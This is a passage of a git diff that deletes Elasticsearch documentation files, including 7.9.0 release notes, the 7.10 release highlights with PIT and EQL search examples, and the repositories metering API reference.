(issue: {es-issue}42133[#42133]) -* Add RequestConfig support to RequestOptions {es-pull}57972[#57972] - -Infra/Circuit Breakers:: -* Enhance real memory circuit breaker with G1 GC {es-pull}58674[#58674] (issue: {es-issue}57202[#57202]) - -Infra/Core:: -* Introduce node.roles setting {es-pull}54998[#54998] - -Infra/Packaging:: -* Remove DEBUG-level logging from actions in Docker {es-pull}57389[#57389] (issues: {es-issue}51198[#51198], {es-issue}51459[#51459]) - -Infra/Plugins:: -* Improved ExtensiblePlugin {es-pull}58234[#58234] - -Infra/Resiliency:: -* Adds resiliency to read-only filesystems #45286 {es-pull}52680[#52680] (issue: {es-issue}45286[#45286]) - -Machine Learning:: -* Accounting for model size when models are not cached. {es-pull}58670[#58670] -* Adds new for_export flag to GET _ml/inference API {es-pull}57351[#57351] -* Adds WKT geometry detection in find_file_structure {es-pull}57014[#57014] (issue: {es-issue}56967[#56967]) -* Calculate cache misses for inference and return in stats {es-pull}58252[#58252] -* Delete auto-generated annotations when job is deleted. {es-pull}58169[#58169] (issue: {es-issue}57976[#57976]) -* Delete auto-generated annotations when model snapshot is reverted {es-pull}58240[#58240] (issue: {es-issue}57982[#57982]) -* Delete expired data by job {es-pull}57337[#57337] -* Introduce Annotation.event field {es-pull}57144[#57144] (issue: {es-issue}55781[#55781]) -* Add support for larger forecasts in memory via max_model_memory setting {ml-pull}1238[#1238], {es-pull}57254[#57254] -* Don't lose precision when saving model state {ml-pull}1274[#1274] -* Parallelize the feature importance calculation for classification and regression over trees {ml-pull}1277[#1277] -* Add an option to do categorization independently for each partition {ml-pull}1293[#1293], {ml-pull}1318[#1318], {ml-pull}1356[#1356], {es-pull}57683[#57683] -* Memory usage is reported during job initialization {ml-pull}1294[#1294] -* More realistic memory estimation for classification and regression means that these analyses will require lower memory limits than before {ml-pull}1298[#1298] -* Checkpoint state to allow efficient failover during coarse parameter search for classification and regression {ml-pull}1300[#1300] -* Improve data access patterns to speed up classification and regression {ml-pull}1312[#1312] -* Performance improvements for classification and regression, particularly running multithreaded {ml-pull}1317[#1317] -* Improve runtime and memory usage training deep trees for classification and regression {ml-pull}1340[#1340] -* Improvement in handling large inference model definitions {ml-pull}1349[#1349] -* Add a peak_model_bytes field to model_size_stats {ml-pull}1389[#1389] - -Mapping:: -* Add regex query support to wildcard field {es-pull}55548[#55548] (issue: {es-issue}54725[#54725]) -* Make `keyword` a family of field types {es-pull}58315[#58315] (issue: {es-issue}53175[#53175]) -* Store parsed mapping settings in IndexSettings {es-pull}57492[#57492] (issue: {es-issue}57395[#57395]) -* Wildcard field - add support for custom null values {es-pull}57047[#57047] - -Network:: -* Make the number of transport threads equal to the number of available CPUs {es-pull}56488[#56488] - -Recovery:: -* Implement dangling indices API {es-pull}50920[#50920] (issue: {es-issue}48366[#48366]) -* Reestablish peer recovery after network errors {es-pull}55274[#55274] -* Sending operations concurrently in peer recovery {es-pull}58018[#58018] (issue: {es-issue}58011[#58011]) - -Reindex:: -* Throw an illegal_argument_exception when max_docs is less than slices {es-pull}54901[#54901] (issue: {es-issue}52786[#52786]) - -SQL:: -* Implement TIME_PARSE function for parsing strings into TIME values {es-pull}55223[#55223] (issues: {es-issue}54963[#54963], {es-issue}55095[#55095]) -* Implement TOP as an alternative to LIMIT {es-pull}57428[#57428] (issue: {es-issue}41195[#41195]) -* Implement TRIM function {es-pull}57518[#57518] (issue: {es-issue}41195[#41195]) -* Improve performances of LTRIM/RTRIM {es-pull}57603[#57603] (issue: {es-issue}57594[#57594]) -* Make CASTing string to DATETIME more lenient {es-pull}57451[#57451] -* Redact credentials in connection exceptions {es-pull}58650[#58650] (issue: {es-issue}56474[#56474]) -* Relax parsing of date/time escaped literals {es-pull}58336[#58336] (issue: {es-issue}58262[#58262]) -* Add support for scalars within LIKE/RLIKE {es-pull}56495[#56495] (issue: {es-issue}55058[#55058]) - -Search:: -* Add description to submit and get async search, as well as cancel tasks {es-pull}57745[#57745] -* Add matchBoolPrefix static method in query builders {es-pull}58637[#58637] (issue: {es-issue}58388[#58388]) -* Add range query support to wildcard field {es-pull}57881[#57881] (issue: {es-issue}57816[#57816]) -* Group docIds by segment in FetchPhase to better use LRU cache {es-pull}57273[#57273] -* Improve error handling when decoding async execution ids {es-pull}56285[#56285] -* Specify reason whenever async search gets cancelled {es-pull}57761[#57761] -* Use index sort range query when possible. {es-pull}56657[#56657] (issue: {es-issue}48665[#48665]) - -Security:: -* Add machine learning admin permissions to the kibana_system role {es-pull}58061[#58061] -* Just log 401 stacktraces {es-pull}55774[#55774] - -Snapshot/Restore:: -* Deduplicate Index Metadata in BlobStore {es-pull}50278[#50278] (issues: {es-issue}45736[#45736], {es-issue}46250[#46250], {es-issue}49800[#49800]) -* Default to zero replicas for searchable snapshots {es-pull}57802[#57802] (issue: {es-issue}50999[#50999]) -* Enable fully concurrent snapshot operations {es-pull}56911[#56911] -* Support cloning of searchable snapshot indices {es-pull}56595[#56595] -* Track GET/LIST Azure Storage API calls {es-pull}56773[#56773] -* Track GET/LIST GoogleCloudStorage API calls {es-pull}56585[#56585] -* Track PUT/PUT_BLOCK operations on AzureBlobStore. {es-pull}56936[#56936] -* Track multipart/resumable uploads GCS API calls {es-pull}56821[#56821] -* Track upload requests on S3 repositories {es-pull}56826[#56826] - -Task Management:: -* Add index name to refresh mapping task {es-pull}57598[#57598] -* Cancel task and descendants on channel disconnects {es-pull}56620[#56620] (issues: {es-issue}56327[#56327], {es-issue}56619[#56619]) - -Transform:: -* Add support for terms agg in transforms {es-pull}56696[#56696] -* Adds geotile_grid support in group_by {es-pull}56514[#56514] (issue: {es-issue}56121[#56121]) - - - -[[bug-7.9.0]] -[discrete] -=== Bug fixes - -Aggregations:: -* Fix auto_date_histogram interval {es-pull}56252[#56252] (issue: {es-issue}56116[#56116]) -* Fix bug in faster interval rounding {es-pull}56433[#56433] (issue: {es-issue}56400[#56400]) -* Fix bug in parent and child aggregators when parent field not defined {es-pull}57089[#57089] (issue: {es-issue}42997[#42997]) -* Fix missing null values for std_deviation_bounds in ext. stats aggs {es-pull}58000[#58000] - -Allocation:: -* Reword INDEX_READ_ONLY_ALLOW_DELETE_BLOCK message {es-pull}58410[#58410] (issues: {es-issue}42559[#42559], {es-issue}50166[#50166], {es-issue}58376[#58376]) - -Authentication:: -* Map only specific type of OIDC Claims {es-pull}58524[#58524] - -Authorization:: -* Change privilege of enrich stats API to monitor {es-pull}52027[#52027] (issue: {es-issue}51677[#51677]) - -Engine:: -* Fix local translog recovery not updating safe commit in edge case {es-pull}57350[#57350] (issue: {es-issue}57010[#57010]) -* Hide AlreadyClosedException on IndexCommit release {es-pull}57986[#57986] (issue: {es-issue}57797[#57797]) - -Features/ILM+SLM:: -* Normalized prefix for rollover API {es-pull}57271[#57271] (issue: {es-issue}53388[#53388]) - -Features/Indices APIs:: -* Don't allow invalid template combinations {es-pull}56397[#56397] (issues: {es-issue}53101[#53101], {es-issue}56314[#56314]) -* Handle `cluster.max_shards_per_node` in YAML config {es-pull}57234[#57234] (issue: {es-issue}40803[#40803]) - -Features/Ingest:: -* Fix ingest simulate verbose on failure with conditional {es-pull}56478[#56478] (issue: {es-issue}56004[#56004]) - -Geo:: -* Check for degenerated lines when calculating the centroid {es-pull}58027[#58027] (issue: {es-issue}55851[#55851]) -* Fix bug in circuit-breaker check for geoshape grid aggregations {es-pull}57962[#57962] (issue: {es-issue}57847[#57847]) - -Infra/Scripting:: -* Fix source return bug in scripting {es-pull}56831[#56831] (issue: {es-issue}52103[#52103]) - -Machine Learning:: -* Fix wire serialization for flush acknowledgements {es-pull}58413[#58413] -* Make waiting for renormalization optional for internally flushing job {es-pull}58537[#58537] (issue: {es-issue}58395[#58395]) -* Tail the C++ logging pipe before connecting other pipes {es-pull}56632[#56632] (issue: {es-issue}56366[#56366]) -* Fix numerical issues leading to blow up of the model plot bounds {ml-pull}1268[#1268] -* Fix causes for inverted forecast confidence interval bounds {ml-pull}1369[#1369] (issue: {ml-issue}1357[#1357]) -* Restrict growth of max matching string length for categories {ml-pull}1406[#1406] - -Mapping:: -* Wildcard field fix for scripts - changed value type from BytesRef to String {es-pull}58060[#58060] (issue: {es-issue}58044[#58044]) - -SQL:: -* Introduce JDBC option for meta pattern escaping {es-pull}40661[#40661] (issue: {es-issue}40640[#40640]) - -Search:: -* Don't omit empty arrays when filtering _source {es-pull}56527[#56527] (issues: {es-issue}20736[#20736], {es-issue}22593[#22593], {es-issue}23796[#23796]) -* Fix casting of scaled_float in sorts {es-pull}57207[#57207] - -Snapshot/Restore:: -* Account for recovery throttling when restoring snapshot {es-pull}58658[#58658] (issue: {es-issue}57023[#57023]) -* Fix noisy logging during snapshot delete {es-pull}56264[#56264] -* Fix S3ClientSettings leak {es-pull}56703[#56703] (issue: {es-issue}56702[#56702]) - - - -[[upgrade-7.9.0]] -[discrete] -=== Upgrades - -Search:: -* Update to lucene snapshot e7c625430ed {es-pull}57981[#57981] diff --git a/docs/reference/release-notes/highlights.asciidoc b/docs/reference/release-notes/highlights.asciidoc deleted file mode 100644 index 85cb4943b61..00000000000 --- a/docs/reference/release-notes/highlights.asciidoc +++ /dev/null @@ -1,260 +0,0 @@ -[[release-highlights]] -== What's new in {minor-version} - -Here are the highlights of what's new and improved in {es} {minor-version}! -ifeval::["{release-state}"!="unreleased"] -For detailed information about this release, see the -<> and -<>. -endif::[] - -// Add previous release to the list -Other versions: -{ref-bare}/7.9/release-highlights.html[7.9] -| {ref-bare}/7.8/release-highlights.html[7.8] -| {ref-bare}/7.7/release-highlights.html[7.7] -| {ref-bare}/7.6/release-highlights-7.6.0.html[7.6] -| {ref-bare}/7.5/release-highlights-7.5.0.html[7.5] -| {ref-bare}/7.4/release-highlights-7.4.0.html[7.4] -| {ref-bare}/7.3/release-highlights-7.3.0.html[7.3] -| {ref-bare}/7.2/release-highlights-7.2.0.html[7.2] -| {ref-bare}/7.1/release-highlights-7.1.0.html[7.1] -| {ref-bare}/7.0/release-highlights-7.0.0.html[7.0] - -// tag::notable-highlights[] -[discrete] -[[indexing-speed-improvement]] -=== Indexing speed improvement - -{es} 7.10 improves indexing speed by up to 20%. We've reduced the coordination -needed to add entries to the {ref}/index-modules-translog.html[transaction log]. -This reduction allows for more concurrency and increases the transaction -log buffer size from `8KB` to `1MB`. However, performance gains are lower for -full-text search and other analysis-intensive use cases. The heavier the -indexing chain, the lower the gains, so indexing chains that involve many -fields, ingest pipelines or full-text indexing will see lower gains. - -[discrete] -[[more-space-efficient-indices]] -=== More space-efficient indices - -{es} 7.10 depends on Apache Lucene 8.7, which introduces higher compression of -stored fields, the part of the index that notably stores the -{ref}/mapping-source-field.html[`_source`]. On the various data sets that we -benchmark against, we noticed space reductions between 0% and 10%. This change -especially helps on data sets that have lots of redundant data across documents, -which is typically the case of the documents that are produced by our -Observability solutions, which repeat metadata about the host that produced the -data on every document. - -Elasticsearch offers the ability to configure the -{ref}/index-modules.html#index-codec[`index.codec`] setting to tell -{es} how aggressively to compress stored fields. Both supported values -`default` and `best_compression` will get better compression with this change. - -[discrete] -[[data-tier-formalization]] -=== Data tiers - -7.10 introduces the concept of formalized data tiers within {es}. -{ref}/data-tiers.html[Data tiers] are a simple, integrated approach that gives -users control over optimizing for cost, performance, and breadth/depth of data. -Prior to this formalization, many users configured their own tier topology using -custom node attributes as well as using {ilm-init} to manage the lifecycle and -location of data within a cluster. - -With this formalization, data tiers (content, hot, warm, and cold) can be -explicitly configured using {ref}/modules-node.html#node-roles[node roles], and -indices can be configured to be allocated within a specific tier using -{ref}/data-tier-shard-filtering.html[index-level data tier allocation filtering]. -{ilm-init} will make use of these tiers to -{ref}/ilm-migrate.html[automatically migrate] data between nodes as an index -goes through the phases of its lifecycle. - -Newly created indices abstracted by a {ref}/data-streams.html[data stream] will -be allocated to the `data_hot` tier automatically, while standalone indices will -be allocated to the `data_content` tier automatically. Nodes with the -pre-existing `data` role are considered to be part of all tiers. - - -[discrete] -[[auc-roc-eval-class]] -=== AUC ROC evaluation metrics for classification analysis - -{ml-docs}/ml-dfanalytics-evaluate.html#ml-dfanalytics-class-aucroc[Area under the curve of receiver operating characteristic (AUC ROC)] -is an evaluation metric that has been available for {oldetection} since 7.3 and -now is available for {classification} analysis. AUC ROC represents the -performance of the {classification} process at different predicted probability -thresholds. The true positive rate for a specific class is compared against the -rate of all the other classes combined at the different threshold levels to -create the curve. - - -[discrete] -[[custom-feature-processor-dfa]] -=== Custom feature processors in {dfanalytics} - -Feature processors enable you to extract process features from document fields. -You can use these features in model training and model deployment. Custom -feature processors provide a mechanism to create features that can be used at -search and ingest time and they don’t take up space in the index. -This process more tightly couples feature generation with the resulting model. -The result is simplified model management as both the features and the model can -easily follow the same life cycle. - - -[discrete] -[[points-in-time-for-search]] -=== Points in time (PITs) for search - -In 7.10, we're introducing points in time (PITs), a lightweight way to preserve -index state over searches. PITs improve end-user experience by making UIs more -reactive. - -By default, a search request waits for complete results before returning a -response. For example, a search that retrieves top hits and aggregations returns -a response only after both top hits and aggregations are computed. However, -aggregations are usually slower and more expensive to compute than top hits. -Instead of sending a combined request, you can send two separate requests: one -for top hits and another one for aggregations. With separate search requests, a -UI can display top hits as soon as they're available and display aggregation -data after the slower aggregation request completes. You can use a PIT to ensure -both search requests run on the same data and index state. - -To use a PIT in a search, you must first explicitly create the PIT using the new -{ref}/point-in-time-api.html[open PIT API]. PITs get automatically garbage-collected -after `keep_alive` if no follow-up request extends their duration. - -[source,console] ----- -POST /my-index-000001/_pit?keep_alive=1m ----- -// TEST[setup:my_index] - -The API returns a PIT ID you can use in search requests. You can also -configure by how long to extend your PIT's lifespan using the search request's -`keep_alive` parameter. - -[source,console] ----- -POST /_search -{ - "size": 100, - "query": { - "match" : { - "title" : "elasticsearch" - } - }, - "pit": { - "id": "46ToAwMDaWR4BXV1aWQxAgZub2RlXzEAAAAAAAAAAAEBYQNpZHkFdXVpZDIrBm5vZGVfMwAAAAAAAAAAKgFjA2lkeQV1dWlkMioGbm9kZV8yAAAAAAAAAAAMAWICBXV1aWQyAAAFdXVpZDEAAQltYXRjaF9hbGw_gAAAAA==", - "keep_alive": "1m" - } -} ----- -// TEST[catch:missing] - -PITs automatically close when their `keep_alive` period ends. You can -also manually close PITs you no longer need using the -{ref}/point-in-time-api.html[close PIT API]. Closing a PIT releases the -resources needed to maintain the PIT's index state. - -[source,console] ----- -DELETE /_pit -{ - "id" : "46ToAwMDaWR4BXV1aWQxAgZub2RlXzEAAAAAAAAAAAEBYQNpZHkFdXVpZDIrBm5vZGVfMwAAAAAAAAAAKgFjA2lkeQV1dWlkMioGbm9kZV8yAAAAAAAAAAAMAWIBBXV1aWQyAAA=" -} ----- -// TEST[catch:missing] - -For more information about using PITs in search, see -{ref}/paginate-search-results.html#search-after[Paginate search results with -`search_after`] or the {ref}/point-in-time-api.html[PIT API documentation]. - -[discrete] -[[support-for-request-level-circuit-breakers]] -=== Request-level circuit breakers on coordinating nodes - -You can now use a coordinating node to account for memory used to perform -partial and final reduce of aggregations in the request circuit breaker. The -search coordinator adds the memory that it used to save and reduce the results -of shard aggregations in the request circuit breaker. Before any partial or -final reduce, the memory needed to reduce the aggregations is estimated and a -CircuitBreakingException is thrown if exceeds the maximum memory allowed in this -breaker. - -This size is estimated as roughly 1.5 times the size of the serialized -aggregations that need to be reduced. This estimation can be completely off for -some aggregations but it is corrected with the real size after the reduce -completes. If the reduce is successful, we update the circuit breaker to remove -the size of the source aggregations and replace the estimation with the -serialized size of the newly reduced result. - -[discrete] -[[eql-case-sensitivity-operator]] -=== EQL: Case-sensitivity and the `:` operator - -In 7.10, we made most EQL operators and functions case-sensitive by default. -We've also added `:`, a new case-insensitive equal operator. Designed for -security use cases, you can use the `:` operator to search for strings in -Windows event logs and other event data containing a mix of letter cases. - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - process where process.executable : "c:\\\\windows\\\\system32\\\\cmd.exe" - """ -} ----- -// TEST[setup:sec_logs] - -For more information, see the {ref}/eql-syntax.html[EQL -syntax documentation]. - -[discrete] -[[deprecate-rest-api-access-to-system-indices]] -=== REST API access to system indices is deprecated - -We are deprecating REST API access to system indices. Most REST API -requests that attempt to access system indices will return the following -deprecation warning: - -[source,text] ----- -this request accesses system indices: [.system_index_name], but in a future -major version, direct access to system indices will be prevented by default ----- - -The following REST API endpoints access system indices as part of their -implementation and will not return the deprecation warning: - -* `GET _cluster/health` -* `GET {index}/_recovery` -* `GET _cluster/allocation/explain` -* `GET _cluster/state` -* `POST _cluster/reroute` -* `GET {index}/_stats` -* `GET {index}/_segments` -* `GET {index}/_shard_stores` -* `GET _cat/[indices,aliases,health,recovery,shards,segments]` - -We are also adding a new metadata flag to track indices. {es} will automatically -add this flag to any existing system indices during upgrade. - -[discrete] -[[add-system-read-thread-pool]] -=== New thread pools for system indices - -We've added two new thread pools for system indices: `system_read` and -`system_write`. These thread pools ensure system indices critical to the Elastic -Stack, such as those used by security or Kibana, remain responsive when -a cluster is under heavy query or indexing load. - -`system_read` is a `fixed` thread pool used to manage resources for -read operations targeting system indices. Similarly, `system_write` is a -`fixed` thread pool used to manage resources for write operations targeting -system indices. Both have a maximum number of threads equal to `5` -or half of the available processors, whichever is smaller. -// end::notable-highlights[] diff --git a/docs/reference/repositories-metering-api/apis/clear-repositories-metering-archive.asciidoc b/docs/reference/repositories-metering-api/apis/clear-repositories-metering-archive.asciidoc deleted file mode 100644 index 2a4ff84e2ec..00000000000 --- a/docs/reference/repositories-metering-api/apis/clear-repositories-metering-archive.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[clear-repositories-metering-archive-api]] -=== Clear repositories metering archive -++++ -Clear repositories metering archive -++++ - -Removes the archived repositories metering information present in the cluster. - -[[clear-repositories-metering-archive-api-request]] -==== {api-request-title} - -`DELETE /_nodes//_repositories_metering/` - -[[clear-repositories-metering-archive-ap-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[clear-repositories-metering-archive-api-desc]] -==== {api-description-title} - -You can use this API to clear the archived repositories metering information in the cluster. - -[[clear-repositories-metering-archive-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=node-id] - -``:: - (long) Specifies the maximum <> to be cleared from the archive. - -All the nodes selective options are explained <>. -[role="child_attributes"] -[[clear-repositories-metering-archive-api-response-body]] -==== {api-response-body-title} -Returns the deleted archived repositories metering information. - -include::{es-repo-dir}/repositories-metering-api/apis/repositories-meterings-body.asciidoc[tag=repositories-metering-body] diff --git a/docs/reference/repositories-metering-api/apis/get-repositories-metering.asciidoc b/docs/reference/repositories-metering-api/apis/get-repositories-metering.asciidoc deleted file mode 100644 index 86b2a61e3e9..00000000000 --- a/docs/reference/repositories-metering-api/apis/get-repositories-metering.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[get-repositories-metering-api]] -=== Get repositories metering information -++++ -Get repositories metering information -++++ - -Returns cluster repositories metering information. - -[[get-repositories-metering-api-request]] -==== {api-request-title} - -`GET /_nodes//_repositories_metering` - -[[get-repositories-metering-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[get-repositories-metering-api-desc]] -==== {api-description-title} - -You can use the cluster repositories metering API to retrieve repositories metering information in a cluster. - -This API exposes monotonically non-decreasing counters and it's expected that clients would durably store -the information needed to compute aggregations over a period of time. Additionally, the information -exposed by this API is volatile, meaning that it won't be present after node restarts. - -[[get-repositories-metering-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=node-id] - -All the nodes selective options are explained <>. - -[role="child_attributes"] -[[get-repositories-metering-api-response-body]] -==== {api-response-body-title} -include::{es-repo-dir}/repositories-metering-api/apis/repositories-meterings-body.asciidoc[tag=repositories-metering-body] diff --git a/docs/reference/repositories-metering-api/apis/repositories-meterings-body.asciidoc b/docs/reference/repositories-metering-api/apis/repositories-meterings-body.asciidoc deleted file mode 100644 index c92c0311f81..00000000000 --- a/docs/reference/repositories-metering-api/apis/repositories-meterings-body.asciidoc +++ /dev/null @@ -1,178 +0,0 @@ -tag::repositories-metering-body[] -`_nodes`:: -(object) -Contains statistics about the number of nodes selected by the request. -+ -.Properties of `_nodes` -[%collapsible%open] -==== -`total`:: -(integer) -Total number of nodes selected by the request. - -`successful`:: -(integer) -Number of nodes that responded successfully to the request. - -`failed`:: -(integer) -Number of nodes that rejected the request or failed to respond. If this value -is not `0`, a reason for the rejection or failure is included in the response. -==== - -`cluster_name`:: -(string) -Name of the cluster. Based on the <> setting. - -`nodes`:: -(object) -Contains repositories metering information for the nodes selected by the request. -+ -.Properties of `nodes` -[%collapsible%open] -==== -``:: -(array) -An array of repository metering information for the node. -+ -.Properties of objects in `node_id` -[%collapsible%open] -===== -`repository_name`:: -(string) -Repository name. - -`repository_type`:: -(string) -Repository type. - -`repository_location`:: -(object) -Represents an unique location within the repository. -+ -.Properties of `repository_location` for repository type `Azure` -[%collapsible%open] -====== -`base_path`:: -(string) -The path within the container where the repository stores data. - -`container`:: -(string) -Container name. -====== -+ -.Properties of `repository_location` for repository type `GCP` -[%collapsible%open] -====== -`base_path`:: -(string) -The path within the bucket where the repository stores data. - -`bucket`:: -(string) -Bucket name. -====== -+ -.Properties of `repository_location` for repository type `S3` -[%collapsible%open] -====== -`base_path`:: -(string) -The path within the bucket where the repository stores data. - -`bucket`:: -(string) -Bucket name. -====== -`repository_ephemeral_id`:: -(string) -An identifier that changes every time the repository is updated. - -`repository_started_at`:: -(long) -Time the repository was created or updated. Recorded in milliseconds -since the https://en.wikipedia.org/wiki/Unix_time[Unix Epoch]. - -`repository_stopped_at`:: -(Optional, long) -Time the repository was deleted or updated. Recorded in milliseconds -since the https://en.wikipedia.org/wiki/Unix_time[Unix Epoch]. - -`archived`:: -(Boolean) -A flag that tells whether or not this object has been archived. -When a repository is closed or updated the repository metering information -is archived and kept for a certain period of time. This allows retrieving -the repository metering information of previous repository instantiations. - -`archive_version`:: -(Optional, long) -The cluster state version when this object was archived, this field -can be used as a logical timestamp to delete all the archived metrics up -to an observed version. This field is only present for archived -repository metering information objects. The main purpose of this -field is to avoid possible race conditions during repository metering -information deletions, i.e. deleting archived repositories metering -information that we haven't observed yet. - -`request_counts`:: -(object) -An object with the number of request performed against the repository -grouped by request type. -+ -.Properties of `request_counts` for repository type `Azure` -[%collapsible%open] -====== -`GetBlobProperties`:: -(long) Number of https://docs.microsoft.com/en-us/rest/api/storageservices/get-blob-properties[Get Blob Properties] requests. -`GetBlob`:: -(long) Number of https://docs.microsoft.com/en-us/rest/api/storageservices/get-blob[Get Blob] requests. -`ListBlobs`:: -(long) Number of https://docs.microsoft.com/en-us/rest/api/storageservices/list-blobs[List Blobs] requests. -`PutBlob`:: -(long) Number of https://docs.microsoft.com/en-us/rest/api/storageservices/put-blob[Put Blob] requests. -`PutBlock`:: -(long) Number of https://docs.microsoft.com/en-us/rest/api/storageservices/put-block[Put Block]. -`PutBlockList`:: -(long) Number of https://docs.microsoft.com/en-us/rest/api/storageservices/put-block-list[Put Block List] requests. - -Azure storage https://azure.microsoft.com/en-us/pricing/details/storage/blobs/[pricing]. -====== -+ -.Properties of `request_counts` for repository type `GCP` -[%collapsible%open] -====== -`GetObject`:: -(long) Number of https://cloud.google.com/storage/docs/json_api/v1/objects/get[get object] requests. -`ListObjects`:: -(long) Number of https://cloud.google.com/storage/docs/json_api/v1/objects/list[list objects] requests. -`InsertObject`:: -(long) Number of https://cloud.google.com/storage/docs/json_api/v1/objects/insert[insert object] requests, -including https://cloud.google.com/storage/docs/uploading-objects[simple], https://cloud.google.com/storage/docs/json_api/v1/how-tos/multipart-upload[multipart] and -https://cloud.google.com/storage/docs/resumable-uploads[resumable] uploads. Resumable uploads can perform multiple http requests to -insert a single object but they are considered as a single request since they are https://cloud.google.com/storage/docs/resumable-uploads#introduction[billed] as an individual operation. - -Google Cloud storage https://cloud.google.com/storage/pricing[pricing]. -====== -+ -.Properties of `request_counts` for repository type `S3` -[%collapsible%open] -====== -`GetObject`:: -(long) Number of https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetObject.html[GetObject] requests. -`ListObjects`:: -(long) Number of https://docs.aws.amazon.com/AmazonS3/latest/API/API_ListObjects.html[ListObjects] requests. -`PutObject`:: -(long) Number of https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutObject.html[PutObject] requests. -`PutMultipartObject`:: -(long) Number of https://docs.aws.amazon.com/AmazonS3/latest/dev/mpuoverview.html[Multipart] requests, -including https://docs.aws.amazon.com/AmazonS3/latest/API/API_CreateMultipartUpload.html[CreateMultipartUpload], -https://docs.aws.amazon.com/AmazonS3/latest/API/API_UploadPart.html[UploadPart] and https://docs.aws.amazon.com/AmazonS3/latest/API/API_CompleteMultipartUpload.html[CompleteMultipartUpload] -requests. - -Amazon Web Services Simple Storage Service https://aws.amazon.com/s3/pricing/[pricing]. -====== -===== -==== -end::repositories-metering-body[] diff --git a/docs/reference/repositories-metering-api/repositories-metering-apis.asciidoc b/docs/reference/repositories-metering-api/repositories-metering-apis.asciidoc deleted file mode 100644 index 7d6a0b8da0a..00000000000 --- a/docs/reference/repositories-metering-api/repositories-metering-apis.asciidoc +++ /dev/null @@ -1,16 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[repositories-metering-apis]] -== Repositories metering APIs - -experimental[] - -You can use the following APIs to retrieve repositories metering information. - -This is an API used by Elastic's commercial offerings. - -* <> -* <> - -include::apis/get-repositories-metering.asciidoc[] -include::apis/clear-repositories-metering-archive.asciidoc[] diff --git a/docs/reference/rest-api/common-parms.asciidoc b/docs/reference/rest-api/common-parms.asciidoc deleted file mode 100644 index d615b28470d..00000000000 --- a/docs/reference/rest-api/common-parms.asciidoc +++ /dev/null @@ -1,1102 +0,0 @@ - - -tag::actions[] -`actions`:: -+ --- -(Optional, string) -Comma-separated list or wildcard expression -of actions used to limit the request. - -Omit this parameter to return all actions. --- -end::actions[] - -tag::active-only[] -`active_only`:: -(Optional, Boolean) -If `true`, -the response only includes ongoing shard recoveries. -Defaults to `false`. -end::active-only[] - -tag::index-alias[] -Comma-separated list or wildcard expression of index alias names -used to limit the request. -end::index-alias[] - -tag::aliases[] -`aliases`:: -(Optional, <>) Index aliases which include the -index. See <>. -end::aliases[] - -tag::index-alias-filter[] -<> -used to limit the index alias. -+ -If specified, -the index alias only applies to documents returned by the filter. -end::index-alias-filter[] - -tag::target-index-aliases[] -`aliases`:: -(Optional, <>) -Index aliases which include the target index. -See <>. -end::target-index-aliases[] - -tag::allow-no-indices[] -`allow_no_indices`:: -(Optional, Boolean) -If `false`, the request returns an error if any wildcard expression, -<>, or `_all` value targets only missing or closed -indices. This behavior applies even if the request targets other open indices. -For example, a request targeting `foo*,bar*` returns an error if an index -starts with `foo` but no index starts with `bar`. -end::allow-no-indices[] - -tag::allow-no-match-transforms1[] -Specifies what to do when the request: -+ --- -* Contains wildcard expressions and there are no {transforms} that match. -* Contains the `_all` string or no identifiers and there are no matches. -* Contains wildcard expressions and there are only partial matches. - -The default value is `true`, which returns an empty `transforms` array when -there are no matches and the subset of results when there are partial matches. - -If this parameter is `false`, the request returns a `404` status code when there -are no matches or only partial matches. --- -end::allow-no-match-transforms1[] - -tag::allow-no-match-transforms2[] -Specifies what to do when the request: -+ --- -* Contains wildcard expressions and there are no {transforms} that match. -* Contains the `_all` string or no identifiers and there are no matches. -* Contains wildcard expressions and there are only partial matches. - -The default value is `true`, which returns a successful acknowledgement message -when there are no matches. When there are only partial matches, the API stops -the appropriate {transforms}. For example, if the request contains -`test-id1*,test-id2*` as the identifiers and there are no {transforms} -that match `test-id2*`, the API nonetheless stops the {transforms} -that match `test-id1*`. - -If this parameter is `false`, the request returns a `404` status code when there -are no matches or only partial matches. --- -end::allow-no-match-transforms2[] - -tag::analyzer[] -`analyzer`:: -(Optional, string) Analyzer to use for the query string. -end::analyzer[] - -tag::analyze_wildcard[] -`analyze_wildcard`:: -(Optional, Boolean) If `true`, wildcard and prefix queries are -analyzed. Defaults to `false`. -end::analyze_wildcard[] - -tag::bytes[] -`bytes`:: -(Optional, <>) Unit used to display byte values. -end::bytes[] - -tag::checkpointing-changes-last-detected-at[] -The timestamp when changes were last detected in the source indices. -end::checkpointing-changes-last-detected-at[] - -tag::cluster-health-status[] -(string) -Health status of the cluster, based on the state of its primary and replica -shards. Statuses are: - - `green`::: - All shards are assigned. - - `yellow`::: - All primary shards are assigned, but one or more replica shards are - unassigned. If a node in the cluster fails, some - data could be unavailable until that node is repaired. - - `red`::: - One or more primary shards are unassigned, so some data is unavailable. This - can occur briefly during cluster startup as primary shards are assigned. -end::cluster-health-status[] - -tag::committed[] -If `true`, -the segments is synced to disk. Segments that are synced can survive a hard reboot. -+ -If `false`, -the data from uncommitted segments is also stored in -the transaction log so that Elasticsearch is able to replay -changes on the next start. -end::committed[] - -tag::completion-fields[] -`completion_fields`:: -(Optional, string) -Comma-separated list or wildcard expressions of fields -to include in `fielddata` and `suggest` statistics. -end::completion-fields[] - -tag::default_operator[] -`default_operator`:: -(Optional, string) The default operator for query string query: AND or OR. -Defaults to `OR`. -end::default_operator[] - -tag::dest[] -The destination for the {transform}. -end::dest[] - -tag::dest-index[] -The _destination index_ for the {transform}. The mappings of the destination -index are deduced based on the source fields when possible. If alternate -mappings are required, use the -https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-create-index.html[Create index API] -prior to starting the {transform}. -end::dest-index[] - -tag::dest-pipeline[] -The unique identifier for a <>. -end::dest-pipeline[] - -tag::detailed[] 